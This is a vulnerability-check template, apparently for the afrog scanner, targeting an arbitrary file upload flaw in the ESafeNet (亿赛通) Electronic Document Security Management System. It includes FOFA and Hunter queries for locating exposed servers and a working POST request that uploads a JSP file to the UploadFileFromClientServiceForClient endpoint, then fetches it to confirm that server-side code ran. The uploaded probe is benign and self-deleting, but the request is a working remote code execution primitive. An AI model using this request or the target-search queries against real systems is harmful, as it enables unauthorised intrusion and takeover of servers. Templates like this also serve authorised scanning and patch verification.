Vulnerability description
The UploadFileFromClientServiceForClient endpoint of the 亿赛通 (ESafeNet) Electronic Document Security Management System has an arbitrary file upload vulnerability; an attacker can use it to upload arbitrary files to the server and gain control of the host.
FOFA: app="亿赛通-电子文档安全管理系统"
HUNTER: web.title="电子文档安全管理系统"
id: esafenet-uploadfilefromclientserviceforclient-fileupload

info:
  name: 亿赛通 电子文档安全管理系统 UploadFileFromClientServiceForClient 任意文件上传
  author: zan8in
  severity: critical
  verified: true
  description: |-
    亿赛通 电子文档安全管理系统 UploadFileFromClientServiceForClient 接口存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件到服务器中,获取主机权限
    FOFA: app="亿赛通-电子文档安全管理系统"
    HUNTER: web.title="电子文档安全管理系统"
  reference:
    - https://mp.weixin.qq.com/s/CtgmNreh-32RyAJgBQsmrA
  tags: esafenet,fileupload
  created: 2023/09/05

set:
  r2: randomInt(40000, 44800)
  r3: randomInt(40000, 44800)

rules:
  r0:
    request:
      method: POST
      path: /CDGServer3/UploadFileFromClientServiceForClient?AFMALANMJCEOENIBDJMKFHBANGEPKHNOFJBMIFJPFNKFOKHJNMLCOIDDJGNEIPOLOKGAFAFJHDEJPHEPLFJHDGPBNELNFIICGFNGEOEFBKCDDCGJEPIKFHJFAOOHJEPNNCLFHDAFDNCGBAEELJFFHABJPDPIEEMIBOECDMDLEPBJGBGCGLEMBDFAGOGM
      body: |
        <%out.print({{r2}} * {{r3}});new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
    expression: response.status == 200
  r1:
    request:
      method: GET
      path: /tttT.jsp
    expression: response.status == 200 && response.body.bcontains(bytes(string(r2 * r3)))

expression: r0() && r1()